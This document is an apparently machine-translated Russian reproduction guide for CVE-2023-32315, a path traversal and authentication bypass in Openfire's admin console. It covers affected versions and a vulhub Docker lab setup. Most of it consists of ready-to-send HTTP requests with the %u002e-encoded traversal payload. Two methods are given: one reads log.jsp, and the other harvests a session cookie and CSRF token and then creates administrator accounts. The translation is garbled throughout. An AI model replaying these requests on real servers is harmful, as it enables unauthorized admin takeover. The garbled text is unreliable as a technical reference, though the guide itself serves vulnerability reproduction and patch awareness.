Openfire — это сервер для совместной работы в реальном времени (RTC), лицензированный по лицензии Apache с открытым исходным кодом, который использует единственный широко распространенный открытый протокол для обмена мгновенными сообщениями XMPP (также известный как Jabber).
Номер уязвимости: CVE-2023-32315.
Более десяти лет назад Openfire управлять За кулисами Обнаружен путь, пересекающийлазейки,CVE-2008-6508。Злоумышленник может воспользоваться/setup/setup-/../../[page].jsp
для обхода контрольных сумм разрешенийдоступпроизвольный За страница с кулисами. С тех пор Openfire Для защиты от этой уязвимости была добавлена стратегия защиты от проблем обхода пути. Но поскольку позже встроенный Web Обновление сервера представило UTF-16 Поддержка символов для нестандартных URL, и предыдущая стратегия защиты не учитывала это.
В версиях Openfire 4.7.4 и 4.6.7 и более ранних версиях в серверной части веб-управления Openfire существует уязвимость обхода каталога, которая позволяет злоумышленнику обойти проверку разрешений и получить доступ ко всем страницам с ограниченным доступом.
3.10.0 <= Openfire < 4.6.8
4.7.0 <= Openfire 4.7.x < 4.7.5
vulhub
/vulhub-master/openfire/CVE-2023-32315
Откройте стрельбище
docker-compose up -d
Получите доступ к порту IP:9090, чтобы перейти на страницу входа в систему.
используйте этолазейки Можно обойти в качестве подтверждениялазейкижитьсуществоватьOpenfire Чувствительная информация утекла
Затронутая версия
3.10.0 <= Openfire <= 3.10.3
4.0.0 <= Openfire <= 4.0.4
4.1.0 <= Openfire <= 4.1.6
4.2.0 <= Openfire <= 4.2.4
4.3.0 <= Openfire <= 4.3.2
4.4.0 <= Openfire <= 4.4.4
4.5.0 <= Openfire <= 4.5.6
4.6.0 <= Openfire <= 4.6.7
4.7.0 <= Openfire <= 4.7.4
Повторение уязвимости payload:
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Запросить пакет:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
URL-адрес доступа через браузер: адрес для входа:
http://192.168.200.166:9090/login.jsp?url=%2Findex.jsp
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
Host: 192.168.200.166:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken
Хотя этот пакет запросов и ответов содержит исключение,Но на самом деле создан новый пользователь,Пароль учетной записиhackme
Непосредственно используйте созданного нового пользователя для входа в серверную часть.
Если описанный выше метод не работает успешно, вы можете попробовать второй метод.
Получить JSESSIONID и csrftoken
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: 192.168.200.166:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
получать
Set-Cookie: JSESSIONID=node0bx4ar4xfrxg31dyngyxcw48un1.node0;
csrf=RVyqrnsveSPIFBl
подделать
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=RVyqrnsveSPIFBl&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node0bx4ar4xfrxg31dyngyxcw48un1.node0; csrf=RVyqrnsveSPIFBl
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Обновите до последней версии:
https://github.com/igniterealtime/Openfire/releases